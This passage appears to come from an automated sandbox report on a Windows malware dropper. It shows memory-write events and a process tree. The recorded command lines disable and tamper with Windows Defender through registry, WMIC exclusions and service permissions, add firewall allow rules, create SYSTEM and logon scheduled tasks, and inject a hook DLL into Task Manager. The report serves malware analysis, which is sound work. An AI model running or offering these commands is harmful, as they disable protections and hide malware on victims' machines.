to memory of 2472 2664 AddInProcess32.exe 88 PID 2664 wrote to memory of 2472 2664 AddInProcess32.exe 88 PID 2664 wrote to memory of 2248 2664 AddInProcess32.exe 89 PID 2664 wrote to memory of 2248 2664 AddInProcess32.exe 89 PID 2664 wrote to memory of 2248 2664 AddInProcess32.exe 89 PID 1596 wrote to memory of 4432 1596 1mW5ZGPLevlx3PaKdYtAsBR0.exe 94 PID 1596 wrote to memory of 4432 1596 1mW5ZGPLevlx3PaKdYtAsBR0.exe 94 PID 1596 wrote to memory of 4432 1596 1mW5ZGPLevlx3PaKdYtAsBR0.exe 94 PID 2472 wrote to memory of 3596 2472 kb3gPGjo59wZD7K6fkvvOQ0u.exe 96 PID 2472 wrote to memory of 3596 2472 kb3gPGjo59wZD7K6fkvvOQ0u.exe 96 PID 2472 wrote to memory of 3596 2472 kb3gPGjo59wZD7K6fkvvOQ0u.exe 96 PID 3748 wrote to memory of 656 3748 ycZdOGVRwMfi9SFxM3Dxswkk.exe 98 PID 3748 wrote to memory of 656 3748 ycZdOGVRwMfi9SFxM3Dxswkk.exe 98 PID 3748 wrote to memory of 656 3748 ycZdOGVRwMfi9SFxM3Dxswkk.exe 98 PID 2196 wrote to memory of 4784 2196 NxQedFbABYqU9g52q4tgtpFC.exe 100 PID 2196 wrote to memory of 4784 2196 NxQedFbABYqU9g52q4tgtpFC.exe 100 PID 2196 wrote to memory of 4784 2196 NxQedFbABYqU9g52q4tgtpFC.exe 100 PID 2664 wrote to memory of 1168 2664 AddInProcess32.exe 102 PID 2664 wrote to memory of 1168 2664 AddInProcess32.exe 102 PID 2248 wrote to memory of 1944 2248 x9gEJEXXOQq0VlTGAQEAyYDa.exe 103 PID 2248 wrote to memory of 1944 2248 x9gEJEXXOQq0VlTGAQEAyYDa.exe 103 PID 2248 wrote to memory of 1944 2248 x9gEJEXXOQq0VlTGAQEAyYDa.exe 103 PID 3572 wrote to memory of 5008 3572 kb3gPGjo59wZD7K6fkvvOQ0u.exe 114 PID 3572 wrote to memory of 5008 3572 kb3gPGjo59wZD7K6fkvvOQ0u.exe 114 PID 3572 wrote to memory of 5008 3572 kb3gPGjo59wZD7K6fkvvOQ0u.exe 114 PID 4472 wrote to memory of 2376 4472 1mW5ZGPLevlx3PaKdYtAsBR0.exe 144 PID 4472 wrote to memory of 2376 4472 1mW5ZGPLevlx3PaKdYtAsBR0.exe 144 PID 4472 wrote to memory of 2376 4472 1mW5ZGPLevlx3PaKdYtAsBR0.exe 144 PID 1360 wrote to memory of 3644 1360 NxQedFbABYqU9g52q4tgtpFC.exe 155 PID 1360 wrote to memory of 3644 1360 NxQedFbABYqU9g52q4tgtpFC.exe 155 PID 1360 wrote to memory of 3644 1360 NxQedFbABYqU9g52q4tgtpFC.exe 155 PID 3112 wrote to memory of 3780 3112 ycZdOGVRwMfi9SFxM3Dxswkk.exe 143 PID 3112 wrote to memory of 3780 3112 ycZdOGVRwMfi9SFxM3Dxswkk.exe 143 PID 3112 wrote to memory of 3780 3112 ycZdOGVRwMfi9SFxM3Dxswkk.exe 143 PID 3572 wrote to memory of 1596 3572 kb3gPGjo59wZD7K6fkvvOQ0u.exe 122 PID 3572 wrote to memory of 1596 3572 kb3gPGjo59wZD7K6fkvvOQ0u.exe 122 PID 4472 wrote to memory of 3288 4472 1mW5ZGPLevlx3PaKdYtAsBR0.exe 124 PID 4472 wrote to memory of 3288 4472 1mW5ZGPLevlx3PaKdYtAsBR0.exe 124 PID 1596 wrote to memory of 4092 1596 cmd.exe 126 PID 1596 wrote to memory of 4092 1596 cmd.exe 126 PID 3288 wrote to memory of 240 3288 cmd.exe 127 PID 3288 wrote to memory of 240 3288 cmd.exe 127 PID 3112 wrote to memory of 4240 3112 ycZdOGVRwMfi9SFxM3Dxswkk.exe 128
Processes
-
C:\Users\Admin\AppData\Local\Temp\716741d85859c7c4747395deb709dc0b4b2741a0d15850aa3a706cc05d61bf6d.exe"C:\Users\Admin\AppData\Local\Temp\716741d85859c7c4747395deb709dc0b4b2741a0d15850aa3a706cc05d61bf6d.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3380 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"2⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Users\Admin\Pictures\hiOas1GqV3z5zz7kPWQph9Lq.exe"C:\Users\Admin\Pictures\hiOas1GqV3z5zz7kPWQph9Lq.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:1484 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1484 -s 3844⤵
- Program crash
PID:3848
-
-
-
C:\Users\Admin\Pictures\1mW5ZGPLevlx3PaKdYtAsBR0.exe"C:\Users\Admin\Pictures\1mW5ZGPLevlx3PaKdYtAsBR0.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1596 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4432
-
-
C:\Users\Admin\Pictures\1mW5ZGPLevlx3PaKdYtAsBR0.exe"C:\Users\Admin\Pictures\1mW5ZGPLevlx3PaKdYtAsBR0.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4472 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2376
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵
- Suspicious use of WriteProcessMemory
PID:3288 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:240
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:32
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2596 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:3780
-
-
-
-
-
C:\Users\Admin\Pictures\NxQedFbABYqU9g52q4tgtpFC.exe"C:\Users\Admin\Pictures\NxQedFbABYqU9g52q4tgtpFC.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2196 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4784
-
-
C:\Users\Admin\Pictures\NxQedFbABYqU9g52q4tgtpFC.exe"C:\Users\Admin\Pictures\NxQedFbABYqU9g52q4tgtpFC.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1360 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3644
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:420
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:724
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5048
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:652
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Executes dropped EXE
PID:1344 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1700
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:1200
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵PID:2284
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Command and Scripting Interpreter: PowerShell
PID:3412
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Command and Scripting Interpreter: PowerShell
PID:5100
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵PID:2300
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:1848
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵PID:2192
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵PID:1016
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
- Launches sc.exe
PID:4760
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\ycZdOGVRwMfi9SFxM3Dxswkk.exe"C:\Users\Admin\Pictures\ycZdOGVRwMfi9SFxM3Dxswkk.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3748 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:656
-
-
C:\Users\Admin\Pictures\ycZdOGVRwMfi9SFxM3Dxswkk.exe"C:\Users\Admin\Pictures\ycZdOGVRwMfi9SFxM3Dxswkk.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3112 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3780
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:4240
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:3640
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4596
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2376
-
-
-
-
C:\Users\Admin\Pictures\kb3gPGjo59wZD7K6fkvvOQ0u.exe"C:\Users\Admin\Pictures\kb3gPGjo59wZD7K6fkvvOQ0u.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2472 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3596
-
-
C:\Users\Admin\Pictures\kb3gPGjo59wZD7K6fkvvOQ0u.exe"C:\Users\Admin\Pictures\kb3gPGjo59wZD7K6fkvvOQ0u.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3572 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5008
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵
- Suspicious use of WriteProcessMemory
PID:1596 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:4092
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4964
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4928
-
-
-
-
C:\Users\Admin\Pictures\x9gEJEXXOQq0VlTGAQEAyYDa.exe"C:\Users\Admin\Pictures\x9gEJEXXOQq0VlTGAQEAyYDa.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2248 -
C:\Users\Admin\AppData\Local\Temp\u1qg.0.exe"C:\Users\Admin\AppData\Local\Temp\u1qg.0.exe"4⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1944 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1944 -s 21165⤵
- Program crash
PID:2540
-
-
-
C:\Users\Admin\AppData\Local\Temp\u1qg.1.exe"C:\Users\Admin\AppData\Local\Temp\u1qg.1.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4440 -
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD15⤵PID:404
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2248 -s 6044⤵
- Program crash
PID:2836
-
-
-
C:\Users\Admin\Pictures\GiNvPlTouwEDWnHDe2tyvv48.exe"C:\Users\Admin\Pictures\GiNvPlTouwEDWnHDe2tyvv48.exe"3⤵
- Modifies firewall policy service
- Executes dropped EXE
- Drops file in System32 directory
PID:1168
-
-
C:\Users\Admin\Pictures\tZCUHFO8ACAWr47KkpPTZSnc.exe"C:\Users\Admin\Pictures\tZCUHFO8ACAWr47KkpPTZSnc.exe"3⤵PID:420
-
C:\Users\Admin\AppData\Local\Temp\7zS80CF.tmp\Install.exe.\Install.exe /tEdidDDf "385118" /S4⤵PID:1528
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"5⤵PID:4696
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"6⤵PID:3780
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 67⤵PID:2504
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 68⤵PID:3024
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"6⤵PID:4608
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 67⤵PID:3472
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 68⤵PID:4784
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"6⤵PID:4476
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 67⤵PID:4452
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 68⤵PID:1368
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"6⤵PID:4480
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 67⤵PID:2112
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 68⤵PID:560
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"6⤵PID:3556
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force7⤵PID:4744
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force8⤵
- Command and Scripting Interpreter: PowerShell
PID:2540 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force9⤵PID:2944
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵PID:2612
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵PID:4784
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Command and Scripting Interpreter: PowerShell
PID:4608 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵PID:4620
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 18:34:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS80CF.tmp\Install.exe\" it /qSFdidiFAY 385118 /S" /V1 /F5⤵
- Creates scheduled task(s)
PID:2780
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"5⤵PID:904
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ6⤵PID:1456
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn bbmnnUCIPYyTQrzMQJ7⤵PID:3280
-
-
-
-
-
-
C:\Users\Admin\Pictures\cqSHdAKIF3RrNSxPrQrxyl2S.exe"C:\Users\Admin\Pictures\cqSHdAKIF3RrNSxPrQrxyl2S.exe"3⤵PID:1260
-
C:\Users\Admin\AppData\Local\Temp\7zS965A.tmp\Install.exe.\Install.exe /tEdidDDf "385118" /S4⤵PID:4460
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"5⤵PID:4444
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"6⤵PID:2072
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 67⤵PID:2764
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 68⤵PID:4300
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"6⤵PID:924
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 67⤵PID:3372
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 68⤵PID:2304
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"6⤵PID:2216
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 67⤵PID:3080
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 68⤵PID:5012
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"6⤵PID:4232
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 67⤵PID:4652
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 68⤵PID:4728
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"6⤵PID:3308
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force7⤵PID:4596
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force8⤵
- Command and Scripting Interpreter: PowerShell
PID:4452 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force9⤵PID:2412
-
-
-
-
-
-
